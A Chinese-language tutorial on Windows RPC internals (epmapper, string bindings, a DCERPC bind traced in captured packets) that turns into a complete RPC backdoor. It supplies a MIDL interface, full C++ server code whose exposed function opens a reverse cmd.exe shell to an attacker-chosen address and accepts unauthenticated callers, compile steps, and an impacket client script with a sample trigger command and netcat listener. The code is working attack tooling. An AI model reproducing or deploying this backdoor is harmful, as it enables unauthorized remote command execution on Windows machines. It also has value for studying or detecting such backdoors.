RPC简介

全称为Remote Procedure Call（远程过程调用）是Windows操作系统内部的一种机制，应用于程序之间的相互
通信RPC 的总体思路是可以编写在本地和远程执行代码的应用程序。

误区：似乎像远程服务器的基本 TCP 连接。但是在使用RPC接口的过程中，我们不需要处理网络的输入/输出或
者TCP栈。事实上与网络相关的一切都由RPC runtime library(rpcrt4.dll) 和一个存根处理。而存根目的是将数
据打包（即序列化）到一个数据存根中。

epmapper

RPC 架构中最重要的服务之一：epmapper（RPC Endpoint Mapper）此服务负责列出公开的接口。


可使用impacket包中的rpcdumps.py列出所有的RPC接口

python rpcdump.py @10.211.55.3 > 3.txt
RPC工作流程

调用 RPC 接口的过程依赖于两个步骤。

首先，客户端将使用所谓的字符串绑定连接到端点

例：SAMR 接口，系统管理员使用此界面远程管理用户和组。


Prtocol：用于与远程服务器通信的协议
Provider：提供的程序，EXE 或 DLL
UUID：WindowsOS通用唯一识别码 (Universally Unique Identifier)
Bindings：绑定字符串。
字符串绑定定义了如何到达 RPC 接口
字符串绑定的统一格式ObjectUUID@ProtocolSequence:NetworkAddress[Endpoint,Option]
ObjectUUID：我们希望连接的UUID以及版本
ProtocolSequence：用于通过网络传输数据的协议。共有三种主要协议
    NCACN：RPC over a TCP connection
    NCADG：RPC over a UDP connection
    NCALRPC：RPC through a local connection
NetworkAddress：IP
Endpoint：远程接口地址

ncacn_ip_tcp:10.211.55.3[49664]

我们可以通过在端口 49664 上连接到 IP 10.211.55.3来推断出 RPC 接口是可达的。如果我们取这个：

ncalrpc:[samss lpc]

我们可以看到没有 NetworkAddress。这是因为此字符串绑定依赖于ncalrpc协议序列，这意味着 RPC接
口只能通过调用名为samss lpc的端点在本地访问。最后，如果我们采用以下方法：

ncacn_np:\\LHC[\pipe\lsass]

我们可以通过将位于名为 \\LHC的计算机上的 SMB 共享连接到名称管道 \pipe\lsass 来推断该接口是可访问的。

下一步是绑定到接口

我们需要 epmapper 再次公开的两条信息：接口的 UUID 及其版本。

绑定过程将在 RPC 客户端和 RPC 服务器之间创建逻辑连接

抓包分析：


前三个包为标准的TCP连接包，端点正在侦听端口 41337（这是我们选择的后门端口），对应第一步
意思是通过10.211.55.3:41337连接到端口，字符串绑定如下：
ncacn_ip_tcp:10.211.55.3[41337]
后四个紫色的数据包构成了 DCERPC (**分布式计算环境中的 RPC,就像函数原型。理解不深)**绑定操作和 RPC 调用
第一个数据包尝试绑定 UUID 和接口版本


第二个数据包是来自RPC服务器的回复，已接收绑定


第三个包含客户端以序列化格式发送到 RPC 接口的数据存根


一旦数据被格式化，它将被转发到 RPC runtime library。

服务器存根反序列化数据并将其转发到服务器代码。

接口构建

定义我们接口的 IDL 文件

[
        uuid(AB4ED934-1293-10DE-BC12-AE18C48DEF33),
        version(1.0),
        implicit_handle(handle_t ImplicitHandle)
]
interface RemotePrivilegeCall
{
        void SendReverseShell(
                [in, string] wchar_t* ip_address,
                [in] int port
        );
}

前一部分是MIDL 接口头，它包含接口的 UUID（我随机选择）、它的版本和要使用的绑定句柄的类型。
下一部分是MIDL 接口主体，其中包含我们的 RPC 接口函数的定义
使用midl.exe编译为C代码
– 一个客户端存根 (RemotePrivilegeCall_c.c)
– 一个服务器存根 (RemotePrivilege_s.c)
– 每个存根中包含一个标头


服务端（目标机器）代码

#include <stdlib.h>
#include <iostream>
#include <winsock2.h>
#include <windows.h>
#include "RemotePrivilegeCall.h"
// Links the rpcrt4.lib that exposes the WinAPI RPC functions
#pragma comment(lib, "rpcrt4.lib")
// Links the ws2_32.lib which contains the socket functions
#pragma comment(lib, "ws2_32.lib")

// Function that sends the reverse shell
void SendReverseShell(wchar_t* ip_address, int port){
        printf("Sending reverse shell to: %ws:%d\\n", ip_address, port);
        WSADATA wsaData;
        SOCKET s1;
        struct sockaddr_in hax;
        char ip_addr_ascii[16];
        STARTUPINFO sui;
        PROCESS_INFORMATION pi;
        sprintf(ip_addr_ascii, "%ws", ip_address );
        WSAStartup(MAKEWORD(2, 2), &wsaData);
        s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned in
t)NULL, (unsigned int)NULL);

        hax.sin_family = AF_INET;
        hax.sin_port = htons(port);
        hax.sin_addr.s_addr = inet_addr(ip_addr_ascii);

        WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

        memset(&sui, 0, sizeof(sui));
        sui.cb = sizeof(sui);
        sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
        sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) s1;

        LPSTR commandLine = "cmd.exe";
        CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
}

// Security callback function
RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE Interface, void* pBindingHandle){
    return RPC_S_OK; // Whoever binds to the interface, we will allow the connection
}

int main()
{
    RPC_STATUS status; // Used to store the RPC function returns
        RPC_BINDING_VECTOR* pbindingVector = 0;

        // Specify the Rpc endpoints options
        status = RpcServerUseProtseqEpW(
                (RPC_WSTR)L"ncacn_ip_tcp",      // Endpoint to contact
                RPC_C_PROTSEQ_MAX_REQS_DEFAULT, // Default value
                (RPC_WSTR)L"41337",             // Listening port
                NULL                            // Pointer to a security context (we don't care about that)
        );                        

        // Register the interface to the RPC runtime
        status = RpcServerRegisterIf2(
                RemotePrivilegeCall_v1_0_s_ifspec,   // Name of the interface defined in RemotePrivilegeCall.h
                NULL,                                // UUID to bind to (NULL means the one from the MIDL file)
                NULL,                                // Interface to use (NULL means the one from the MIDL file)
                RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, // Invoke the security callback function
                RPC_C_LISTEN_MAX_CALLS_DEFAULT,      // Numbers of simultaneous connections
                (unsigned)-1,                        // Maximum size of data block received
                SecurityCallback                     // Name of the function that acts as the security callback
        );                  

        // Register the interface to the epmapper
        status = RpcServerInqBindings(&pbindingVector);
        status = RpcEpRegisterW(
                RemotePrivilegeCall_v1_0_s_ifspec,   // Name of the interface defined in RemotePrivilegeCall.h
                pbindingVector,                      // Structure contening the binding vectors
                0,                                   //
                (RPC_WSTR)L"Backdoor RPC interface"  // Name of the interface as exposed on port 135   
        );

        // Launch the interface
        status = RpcServerListen(
                1,                                   // Minimum number of connections
                RPC_C_LISTEN_MAX_CALLS_DEFAULT,      // Maximum number of connetions
                FALSE                                // Starts the interface immediately
        );                              
}

// Function used to allocate memory to the interface
void* __RPC_USER midl_user_allocate(size_t size){
    return malloc(size);
}

// Function used to free memory allocated to the interface
void __RPC_USER midl_user_free(void* p){
    free(p);
}

使用cl.exe将服务器程序和服务器存根编译成一个二进制文件

cl.exe Server.cpp RemotePrivilegeCall_s.c

验证方式：

使用rpcdumps.py枚举 epmapper


已能够正常工作

客户端代码

import argparse
import time
from impacket.dcerpc.v5 import transport
from impacket.structure import Structure
from impacket.uuid import uuidtup_to_bin
from impacket.dcerpc.v5.ndr import NDRCALL
from impacket.dcerpc.v5.dtypes import WSTR
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.transport import DCERPCTransportFactory

parser = argparse.ArgumentParser()
parser.add_argument("-rip", help="Remote computer to target", dest="target_ip", type=str, required=True)
parser.add_argument("-rport", help="IP of the remote procedure listener", dest="port", type=int, required=True)
parser.add_argument("-lip", help="Local IP to receive the reverse shell", dest="lip", type=str, required=True)
parser.add_argument("-lport", help="Local port to receive the reverse shell", dest="lport", type=int, required=True)

args = parser.parse_args()
target_ip = args.target_ip
port = args.port
lip = args.lip
lport = args.lport

class SendReverseShell(NDRCALL):
    structure = (
        ('ip_address', WSTR),
        ('port', "<i")
    )

# Creates the string binding
stringBinding = r'ncacn_ip_tcp:{}[{}]'.format(target_ip, port)

# Connects to the remote endpoint
transport = DCERPCTransportFactory(stringBinding)
dce = transport.get_dce_rpc()
dce.connect()
print("

Connected to the remote target")

# Casts the UUID string and version of the interface into a UUID object and binds to the interface
interface_uuid = uuidtup_to_bin(("AB4ED934-1293-10DE-BC12-AE18C48DEF33", "1.0"))
dce.bind(interface_uuid)
print("

Binded to AB4ED934-1293-10DE-BC12-AE18C48DEF33")

print("

Formatting the client stub")
# Creates the client stub and pack its data so it valid
query = SendReverseShell()
query['ip_address'] = f"{lip}\\x00"
query['port'] = lport

print("

Calling the remote procedure")
try:
    # Calls the function number 0 (the first and only function exposed by our
interface) and pass the data
    dce.call(0, query)
    # Reading the answer of the RPC server
    dce.recv()
except Exception as e:
    print(f"[!] ERROR: {e}")
finally:
    print("

Disconecting from the server")
    # Disconnecting from the remote target
    dce.disconnect()

可调用impacket包实现

python trigger.py -rip 10.211.55.3 -rport 41337 -lip 10.211.55.10 -lport 9812

rip：目标机器

rport：目标机器连接端口

lip：反弹shell监听机器

lport：监听端口

测试

攻击机

跳板机nc反弹shell

目标机器